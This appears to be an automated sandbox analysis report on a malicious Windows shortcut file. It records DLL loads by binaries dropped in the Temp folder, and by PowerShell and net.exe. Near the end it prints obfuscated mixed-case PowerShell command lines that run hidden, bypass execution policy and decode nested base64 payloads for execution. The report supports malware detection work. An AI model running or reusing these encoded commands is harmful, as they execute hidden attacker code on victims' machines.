Source: C:\Windows\Temp\svczHost.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: schannel.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: version.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winsta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: sspicli.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll

Source: C:\Windows\System32\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: 0A3NB8ot11.lnk

Static file information: File size 41943040 > 1048576

Source:

Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.3643874588.000001B5FCF4D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("Q1JQZFhSd2RYUkdhV3hsVUdGMGFDSU5DaUFnSUNBZ0lDQWdjbVYwZFhKdUlDUjBjblZsRFFvZ0lDQWdmU0JqWVhSamFDQjdEUW9nSUNBZ0lDQWdJRmRVVlZWUlNFZE1Ua3dnSkY4dVJYaGpaWEIwYVc5dUxrMWxjM05oWjJVN0RRb2dJQ0FnSU

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior

Suspicious powershell command line found

